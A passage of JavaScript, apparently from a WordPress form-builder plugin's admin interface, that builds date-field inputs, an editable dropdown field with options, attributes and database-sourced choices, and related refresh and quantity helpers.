	    month.setAttribute("name", i+"_monthform_id_temp");
		month.style.width=w_month_size+'px';
		month.setAttribute("onKeyPress", "return check_month(event, '"+i+"_monthform_id_temp')");
		month.setAttribute("onChange", "change_value('"+i+"_monthform_id_temp')");
	    month.setAttribute("onBlur", "if (this.value=='0') this.value=''; else add_0('"+i+"_monthform_id_temp')");
		
	var month_label = document.createElement('label');
		month_label.setAttribute("class", "mini_label");
		month_label.setAttribute("class", "mini_label");
	    month_label.setAttribute("id", i+"_month_label");
		month_label.innerHTML = w_month_label;
			
	var month_ = document.createElement('span');
	    month_.setAttribute("id", i+"_separator2");
	    month_.setAttribute("class", "wdform_separator");
		month_.innerHTML = w_divider;
		
	if(w_to == '')
		w_to = current_date.getFullYear();
	var year = document.createElement('input');
        year.setAttribute("type", 'text');
        year.setAttribute("from", w_from);
        year.setAttribute("to", w_to);
		year.setAttribute("value", w_year);
		year.setAttribute("id", i+"_yearform_id_temp");
		year.setAttribute("name", i+"_yearform_id_temp");
		year.style.width=w_year_size+'px';
		year.setAttribute("onChange", "change_year('"+i+"_yearform_id_temp')");
		year.setAttribute("onKeyPress", "return check_year1(event, '"+i+"_yearform_id_temp')");
		year.setAttribute("onBlur", "check_year2('"+i+"_yearform_id_temp')");

	var year_label = document.createElement('label');
		year_label.setAttribute("class", "mini_label");
	    year_label.setAttribute("id", i+"_year_label");
		year_label.innerHTML = w_year_label;
			
    var main_td  = document.getElementById('show_table');
      
	div_label.appendChild(label);
	div_label.appendChild(required);
	td_date_input1.appendChild(day);
	td_date_separator1.appendChild(day_);
	td_date_input2.appendChild(month);
	td_date_separator2.appendChild(month_);
	td_date_input3.appendChild(year);
	tr_date1.appendChild(td_date_input1);
	tr_date1.appendChild(td_date_separator1);
	tr_date1.appendChild(td_date_input2);
	tr_date1.appendChild(td_date_separator2);
	tr_date1.appendChild(td_date_input3);
	td_date_label1.appendChild(day_label);
	td_date_label2.appendChild(month_label);
	td_date_label3.appendChild(year_label);
	tr_date2.appendChild(td_date_label1);
	tr_date2.appendChild(td_date_label_empty1);
	tr_date2.appendChild(td_date_label2);
	tr_date2.appendChild(td_date_label_empty2);
	tr_date2.appendChild(td_date_label3);
	table_date.appendChild(tr_date1);
	table_date.appendChild(tr_date2);
	div_element.appendChild(adding_type);
	div_element.appendChild(adding_required);
	div_element.appendChild(table_date);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
	div.appendChild(div_field);
	div.appendChild(br9);
	div.appendChild(div_for_editable_labels);
	main_td.appendChild(div);

	if(w_field_label_pos == "top")
		label_top(i);
	
	if(w_day_type == "SELECT")
		field_to_select(i, 'day');
			
	if(w_month_type == "SELECT")
		field_to_select(i, 'month');
			
	if(w_year_type == "SELECT")
		field_to_select(i, 'year');
		
	change_class(w_class, i);
	refresh_attr(i, 'type_date_fields');

	jQuery(document).ready(function(jQuery) {	
		jQuery("label#"+i+"_day_label").click(function() {		
			if (jQuery(this).children('input').length == 0)
			{				
				var day = "<input type='text' class='day' style='outline:none; border:none; background:none; width:100px;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(day);							
				jQuery("input.day").focus();			
				jQuery("input.day").blur(function() {	
					var value = jQuery(this).val();			
					jQuery("#"+i+"_day_label").text(value);		
				});	
			}	
		});		

		jQuery("label#"+i+"_month_label").click(function() {	
			if (jQuery(this).children('input').length == 0)
			{		
				var month = "<input type='text' class='month'  style='outline:none; border:none; background:none; width:100px;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(month);			
				jQuery("input.month").focus();					
				jQuery("input.month").blur(function() {			
					var value = jQuery(this).val();			
					jQuery("#"+i+"_month_label").text(value);	
				});	
			}	
		});
	
		jQuery("label#"+i+"_year_label").click(function() {	
			if (jQuery(this).children('input').length == 0)
			{		
				var year = "<input type='text' class='year' size='8' style='outline:none; border:none; background:none; width:100px;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(year);			
				jQuery("input.year").focus();					
				jQuery("input.year").blur(function() {			
					var value = jQuery(this).val();			
					jQuery("#"+i+"_year_label").text(value);	
				});	
			}	
		});
	});	
}

function type_own_select(i, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_choices, w_choices_checked, w_required, w_value_disabled, w_class, w_attr_name, w_attr_value, w_choices_disabled, w_choices_value, w_choices_params){
	document.getElementById("element_type").value="type_own_select";

	delete_last_child();
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding:60px 0 0 20px; vertical-align:top;";
		edit_main_td3.setAttribute("id", "choices");
		
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');	
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');		
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");
	
	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("class", "fm-field-label");
	        el_size_label.setAttribute("for", "edit_for_input_size");
		el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
		   el_size.setAttribute("id", "edit_for_input_size");
		   el_size.setAttribute("type", "text");
		   el_size.setAttribute("value", w_size);
		   
			
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");
	
	
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
	        el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	
	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
	        el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_required");
                el_required.setAttribute("type", "checkbox");
                
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
				
	var el_disable_value_label = document.createElement('label');
		el_disable_value_label.setAttribute("class", "fm-field-label");
		el_disable_value_label.setAttribute("for", "el_disable_value");
		el_disable_value_label.innerHTML = "Enable option's value";
	
	var el_disable_value = document.createElement('input');
		el_disable_value.setAttribute("id", "el_disable_value");
		el_disable_value.setAttribute("type", "checkbox");   
		el_disable_value.setAttribute("onclick", "refresh_sel_options('"+i+"','select')");
	if(w_value_disabled =="yes")
		el_disable_value.setAttribute("checked", "checked");
		
	var el_attr_label = document.createElement('label');
	    el_attr_label.setAttribute("class", "fm-field-label");            
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var el_choices_label = document.createElement('label');
		el_choices_label.setAttribute("class", "fm-field-label");    
		el_choices_label.innerHTML = "Options";
	var el_choices_add = document.createElement('img');
                el_choices_add.setAttribute("id", "el_choices_add");
           	el_choices_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_choices_add.style.cssText = 'cursor:pointer;';
            	el_choices_add.setAttribute("title", 'add');
                el_choices_add.setAttribute("onClick", "add_choise('select',"+i+")");
				
    var	el_choices_add_text = document.createElement("span");
		el_choices_add_text.style.cssText ="font-size: 12px; padding-left:7px; font-weight:bold; cursor:pointer;";
		el_choices_add_text.innerHTML ="Add option(s)";				
		el_choices_add_text.setAttribute("onClick", "add_choise('select',"+i+")");
		
	var el_choices_important = document.createElement('div');			
	    el_choices_important.style.cssText = 'color:red; padding:10px 0; width:330px;';
		el_choices_important.innerHTML = 'IMPORTANT! Check the "Empty value" checkbox only if you want the option to be considered as empty.';

    var el_choices_select = document.createElement('a');
	    el_choices_select.style.cssText ="color:#000; font-weight:bold; font-size: 13px; cursor:pointer; padding-top:10px; display:block;";
		el_choices_select.innerHTML = "Select options from database";
		el_choices_select.setAttribute("rel", "{handler: 'iframe', size: {x: 530, y: 370}}"	);
		el_choices_select.setAttribute("onclick","tb_show('', 'admin-ajax.php?action=select_data_from_db&field_id="+i+"&field_type=select&value_disabled="+w_value_disabled+"&width=530&height=370&TB_iframe=1')");
		el_choices_select.setAttribute("class","modal");
	


	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
        br3.setAttribute("id", "br1");
	var br4 = document.createElement('br');
        br4.setAttribute("id", "br2");
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td8.appendChild(el_label_size_label);
	edit_main_td8_1.appendChild(el_label_size);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br3);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	edit_main_td4.appendChild(el_required_label);
	edit_main_td4_1.appendChild(el_required);
	
	edit_main_td9.appendChild(el_disable_value_label);
	edit_main_td9_1.appendChild(el_disable_value);
	
	edit_main_td5.appendChild(el_size_label);
	edit_main_td5_1.appendChild(el_size);
	
	edit_main_td3.appendChild(el_choices_label);
	edit_main_td3.appendChild(el_choices_important);
	edit_main_td3_1.appendChild(br7);
	edit_main_td3_1.appendChild(el_choices_add);
	edit_main_td3_1.appendChild(el_choices_add_text);
	edit_main_td3_1.appendChild(el_choices_select);
	
	
	var div_ = document.createElement('div');
		div_.style.cssText = 'border-bottom:1px dotted black; width: 330px;';
		
	var el_choices_mini_label = document.createElement('b');
		el_choices_mini_label.innerHTML="Name";
		el_choices_mini_label.style.cssText='padding-right: 40px; padding-left: 40px; font-size:9px';

	var el_choices_value_mini_label = document.createElement('b');
		el_choices_value_mini_label.innerHTML="Value";
		el_choices_value_mini_label.style.cssText='padding-right: 38px; padding-left: 38px; font-size:9px; font-weight:bold;';

	var el_choices_remove_mini_label = document.createElement('b');
		el_choices_remove_mini_label.innerHTML="Empty value";
		el_choices_remove_mini_label.style.cssText='padding-right: 3px; padding-left: 3px; font-size:9px;font-weight:bold;';
		
	var el_choices_dis_mini_label = document.createElement('b');
		el_choices_dis_mini_label.innerHTML="Delete";
		el_choices_dis_mini_label.style.cssText='padding-left: 3px; padding-right: 3px; font-size:9px; font-weight:bold;';
	
	var el_choices_move_mini_label = document.createElement('b');
		el_choices_move_mini_label.innerHTML="Move";
		el_choices_move_mini_label.style.cssText='padding-left: 3px; padding-right: 3px; font-size:9px; font-weight:bold;';	
		
	div_.appendChild(el_choices_mini_label);
	div_.appendChild(el_choices_value_mini_label);
	div_.appendChild(el_choices_remove_mini_label);
	div_.appendChild(el_choices_dis_mini_label);
	div_.appendChild(el_choices_move_mini_label);
	edit_main_td3.appendChild(div_);
	
	n=w_choices.length;
	for(j=0; j<n; j++)
	{	
		var div = document.createElement('div');
			div.setAttribute("id", j);
			div.setAttribute("class", "change_pos");
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_option"+j);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("class", "fm-field-choice");
			el_choices.setAttribute("value", w_choices[j]);
			el_choices.setAttribute("onKeyUp", "change_label_name('"+j+"', '"+i+"_option"+j+"',  this.value, 'select')");
			el_choices.setAttribute("onpaste", "elem = this; change_label_name_on_paste('"+j+"', '"+i+"_option"+j+"', 'select')");
			if(w_choices_params[j])
				el_choices.setAttribute("disabled", 'disabled');
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_option"+j+"_remove");
			el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_option("+j+","+i+")");
			
		var el_choices_dis = document.createElement('input');
			el_choices_dis.setAttribute("type", 'checkbox');
			el_choices_dis.setAttribute("title", 'Empty value');
			el_choices_dis.setAttribute("id", "el_option"+j+"_dis");
			el_choices_dis.setAttribute("class", "el_option_dis");
			el_choices_dis.setAttribute("onClick", "dis_option('"+i+"_option"+j+"', this.checked)");
			el_choices_dis.style.cssText ="vertical-align: middle; margin-left:21px; margin-right:21px;";
			if(w_choices_disabled[j])
				el_choices_dis.setAttribute("checked", "checked");
			
		if(w_value_disabled =='yes')
				el_choices_dis.setAttribute("disabled", 'disabled');
		
		var el_choices_value = document.createElement('input');
			el_choices_value.setAttribute("id", "el_option_value"+j);
			if(!w_choices_params[j])
			el_choices_value.setAttribute("class", "el_option_value fm-field-choice");
			el_choices_value.setAttribute("type", "text");
			el_choices_value.setAttribute("value", w_choices_value[j]);
			el_choices_value.setAttribute("onKeyUp", "change_label_value('"+i+"_option"+j+"', this.value)");
			el_choices_value.setAttribute("onpaste", "change_label_value_on_paste('"+i+"_option"+j+"', this)");
			if(w_value_disabled=='no' || w_choices_params[j])
				el_choices_value.setAttribute("disabled", 'disabled');
		
		var el_choices_params = document.createElement('input');
			el_choices_params.setAttribute("id", "el_option_params"+j);
			el_choices_params.setAttribute("class", "el_option_params");
			el_choices_params.setAttribute("type", "hidden");
			el_choices_params.setAttribute("value", w_choices_params[j]);

		var el_choices_handle = document.createElement('img');
			el_choices_handle.setAttribute("class", "el_choices_sortable");
			el_choices_handle.setAttribute("src", plugin_url + '/images/move_cursor.png?ver=1.8.0');		
			el_choices_handle.style.cssText = 'cursor:move; vertical-align:middle; margin:2px;';
			el_choices_handle.setAttribute("align", 'top');
		
		div.appendChild(el_choices);
		div.appendChild(el_choices_value);
		div.appendChild(el_choices_dis);
		div.appendChild(el_choices_remove);
		div.appendChild(el_choices_handle);
		div.appendChild(el_choices_params);

		edit_main_td3.appendChild(div);
	
	}


	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_own_select");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
	 var adding_value_disabled = document.createElement("input");
            adding_value_disabled.setAttribute("type", "hidden");
            adding_value_disabled.setAttribute("value", w_value_disabled);
            adding_value_disabled.setAttribute("name", i+"_value_disabledform_id_temp");	
            adding_value_disabled.setAttribute("id", i+"_value_disabledform_id_temp");
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
			
		var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
			div_label.style.width=w_field_label_size+"px";
           	div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			

      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
          	div_element.style.display="table-cell";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
		
	var table_little = document.createElement('div');
           	table_little.setAttribute("id", i+"_table_little");
			table_little.style.display="table";
			
      	var tr_little1 = document.createElement('div');
	        tr_little1.setAttribute("id", i+"_element_tr1");
			tr_little1.style.display="table-row";
		
      	var tr_little2 = document.createElement('div');
 	        tr_little2.setAttribute("id", i+"_element_tr2");
			tr_little2.style.display="table-row";
			
      	var td_little1 = document.createElement('div');
         	td_little1.setAttribute("valign", 'top');
           	td_little1.setAttribute("id", i+"_td_little1");
			td_little1.style.display="table-cell";
			
      	var td_little2 = document.createElement('div');
        	td_little2.setAttribute("valign", 'top');
           	td_little2.setAttribute("id", i+"_td_little2");
			td_little2.style.display="table-cell";
			
   
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
			label.style.verticalAlign="top";
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
			required.style.verticalAlign="top";
	if(w_required=="yes")
			required.innerHTML = " *";
	var select_ = document.createElement('select');
		select_.setAttribute("id", i+"_elementform_id_temp");
		select_.setAttribute("name", i+"_elementform_id_temp");
		select_.style.cssText = "width:"+w_size+"px";
		select_.setAttribute("onchange", "set_select(this)");
		
	for(j=0; j<n; j++)
	{      	
		var option = document.createElement('option');
		option.setAttribute("id", i+"_option"+j);
	if(w_value_disabled =='yes')
				option.setAttribute("value", w_choices_value[j]);
			else
			{
				if(w_choices_disabled[j])
					option.value="";
				else
					option.setAttribute("value", w_choices[j]);
			}
			
			if(w_choices_params[j])
			{
				w_params = w_choices_params[j].split("[where_order_by]");
				option.setAttribute("where", w_params[0]);
				w_params = w_params[1].split("[db_info]");		
				option.setAttribute("order_by", w_params[0]);
				option.setAttribute("db_info", w_params[1]);
			}
		option.setAttribute("onselect", "set_select('"+i+"_option"+j+"')");
           	option.innerHTML = w_choices[j];
	if(w_choices_checked[j]==1)
		option.setAttribute("selected", "selected");
		select_.appendChild(option);
	}			
	
    
      	var main_td  = document.getElementById('show_table');
	
      
      	div_label.appendChild(label);
      	div_label.appendChild(required);
	div_element.appendChild(adding_type);
	
	    div_element.appendChild(adding_required);
	    div_element.appendChild(adding_value_disabled);
      	div_element.appendChild(select_);
      	div_field.appendChild(div_label);
      	div_field.appendChild(div_element);
      	
      
      	div.appendChild(div_field);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
//enable_modals();
jQuery(function() {
	jQuery( "#choices" ).sortable({ 
		items: ".change_pos" ,
		handle: ".el_choices_sortable",
		update: function(event, ui) {		
			refresh_sel_options(i,'select');
		}
	
	});	
  });
}

function form_maker_getElementsByAttribute(node,tag,attr,value){
  var elems = (tag=="*" && node.all) ? node.all : node.getElementsByTagName(tag),
    returnElems = new Array(),
    nValue = (typeof value!="undefined") ? new RegExp("(^|\\s)" + value + "(\\s|$)") : null,
    nAttr,
    cur;
  for (var i = 0; i < elems.length; i++) {
    cur = elems[i];
    nAttr = cur.getAttribute && cur.getAttribute(attr);
    if (typeof nAttr == "string" && nAttr.length > 0) {
      if (typeof value == "undefined" || (nValue && nValue.test(nAttr))) {
        returnElems.push(cur);
      }
    }
  }
  return returnElems;
}


function refresh_sel_options(id, type)
{
	if(type=='checkbox' || type=='radio')
	{
		if(jQuery('#el_disable_value').prop( 'checked' ))
		{
			jQuery('#'+id+'_value_disabledform_id_temp').val('yes');
			jQuery('.el_option_value').removeAttr('disabled');			
		}
		else
		{
			jQuery('#'+id+'_value_disabledform_id_temp').val('no');
			jQuery('.el_option_value').attr('disabled', 'disabled');	
		}

		refresh_rowcol(id, type);
	}	
	
	
	if(type=='select')
	{
		if(jQuery('#el_disable_value').prop( 'checked' ))
		{
			jQuery('#'+id+'_value_disabledform_id_temp').val('yes');
			jQuery('.el_option_value').removeAttr('disabled');
			jQuery('.el_option_dis').attr('disabled', 'disabled');	
			
		}
		else
		{
			jQuery('#'+id+'_value_disabledform_id_temp').val('no');
			jQuery('.el_option_value').attr('disabled', 'disabled');
			jQuery('.el_option_dis').removeAttr('disabled');		
		}

		var select = document.getElementById(id+'_elementform_id_temp');
			select.innerHTML='';

		jQuery('.change_pos').each(function() {
			var idi = jQuery(this)[0].id;

			var option = document.createElement('option');
				option.setAttribute("id", id+"_option"+idi);

			if(jQuery('#el_disable_value').prop( 'checked' ))
			{
				option.setAttribute("value", jQuery(this).find(jQuery("input[type='text']"))[1].value);
			}
			else
			{
				if(jQuery(this).find(jQuery("input[type='checkbox']")).prop( 'checked' ))
					option.value="";
				else
					option.setAttribute("value", jQuery(this).find(jQuery("input[type='text']"))[0].value);
			}	
			
			
			if(jQuery(this).find(jQuery(".el_option_params")).val())
			{
				w_params = jQuery(this).find(jQuery(".el_option_params")).val().split("[where_order_by]");
				option.setAttribute("where", w_params[0]);
				w_params = w_params[1].split("[db_info]");		
				option.setAttribute("order_by", w_params[0]);
				option.setAttribute("db_info", w_params[1]);
			}
		
			option.setAttribute("onselect", "set_select('"+id+"_option"+idi+"')");
			option.innerHTML =	jQuery(this).find(jQuery("input[type='text']"))[0].value;
			
			select.appendChild(option);
		});
	}	

	jQuery('#el_choices_add').parent().find(jQuery('a')).attr("onclick","tb_show('', 'admin-ajax.php?action=select_data_from_db&field_id="+id+"&field_type="+type+"&value_disabled="+jQuery("#"+id+"_value_disabledform_id_temp").val()+"&width=530&height=370&TB_iframe=1')");
	
}


function add_quantity(i, w_quantity_value) {
	div_=document.getElementById(i+"_divform_id_temp");
	// if (div_.getElementById( i+"_element_quantityform_id_temp")) {
  if (form_maker_getElementsByAttribute(div_, "*", "id", i + "_element_quantityform_id_temp") != '') {
		div_.removeChild(document.getElementById( i+"_element_quantity_spanform_id_temp"));
		return;
	}
	select_ = document.createElement('input');
	select_.setAttribute("type", 'text');				
	select_.setAttribute("value", w_quantity_value);				
	select_.setAttribute("id", i+"_element_quantityform_id_temp");
	select_.setAttribute("name", i+"_element_quantityform_id_temp");
	select_.setAttribute("onKeyPress", "return check_isnum(event)");
	select_.setAttribute("onChange", "change_value('"+i+"_element_quantityform_id_temp', this.value)");
